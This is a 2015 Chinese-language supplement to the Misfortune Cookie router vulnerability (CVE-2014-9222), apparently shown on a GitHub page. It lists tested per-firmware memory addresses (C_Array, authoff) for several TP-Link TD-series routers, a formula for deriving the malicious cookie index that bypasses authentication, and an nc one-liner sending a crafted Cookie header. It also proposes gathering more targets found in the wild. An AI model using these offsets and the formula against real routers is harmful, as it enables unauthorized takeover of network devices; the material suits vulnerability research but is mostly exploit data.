Skip to content

Latest commit

 

History

History
94 lines (57 loc) · 2.32 KB

201504141114.txt.md

File metadata and controls

94 lines (57 loc) · 2.32 KB
Raw

标题: Misfortune Cookie漏洞(CVE-2014-9222)补遗

创建: 2015-04-14 11:14 更新: 2015-04-28 12:02 链接: http://scz.617.cn/misc/201504141114.txt

TD-8820

3.0.0 Build 091223 Rel.23304

    C_Array = 0x803C3018
    authoff = 0x80397E69

TD-W8901G

1.0.2 Build 080522 Rel.37708 (这是Piotr Bania所用版本)

    C_Array = 0x803E9A40
    authoff = 0x803AB30D

3.0.1 Build 100603 Rel.28484

    C_Array = 0x8041B3D4
    authoff = 0x803DC701

3.0.1 Build 100901 Rel.23594

    C_Array = 0x80420554
    authoff = 0x803E1829

6.0.0 Build 110119 Rel.25581

    C_Array = 0x804FA3E0
    authoff = 0x804BB941

6.0.0 Build 110915 Rel.06942

    C_Array = 0x80517454
    authoff = 0x804D7CB9

TD-W8901N

1.0.0 Build 121121 Rel.08870 (这是Cawan所用版本)

    C_Array = 0x804163D4
    authoff = 0x8034FF94

TD-W8951ND

1.0.0 Build 100723 Rel.23035

    C_Array = 0x803FD3F0
    authoff = 0x803D2D61

TD-W8961ND

1.0.0 Build 100722 Rel.05210

    C_Array = 0x803FD3F0
    authoff = 0x803D2D61

3.0.0 Build 120808 Rel.08330

    C_Array = 0x804269F4
    authoff = 0x803605B4

C_Array + evilnum * 0x28 = authoff

这里所有的四则运算都是"模0x100000000"四则运算。

要充分考虑这种情形:

( authoff - C_Array ) % 0x28 != 0

此时evilcookie必须进行适当填充,这还得看实际被破坏数据是否无关大碍。

echo -ne "GET / HTTP/1.0\r\nCookie: C=\r\n\r\n" | nc -w 5 -n 80

我没有找到可能存在的神技巧快速、稳定地远程确定这些值:

C_Array authoff evilnum evilcookie

暂时计划在将来的日子里陆续手工收集这些数据,这依赖于我在野地里找到的测试目 标以及能否下载得到相关固件。

前面所列是用于攻击的精确数据,实测无误。为了避免为Script Kids所用,没有直 接显示evilnum、evilcookie。了解该漏洞原理的兄弟请自行推算。

日后我会更新前述列表。有兴趣收集此类数据的兄弟,我们可以一起干这件事。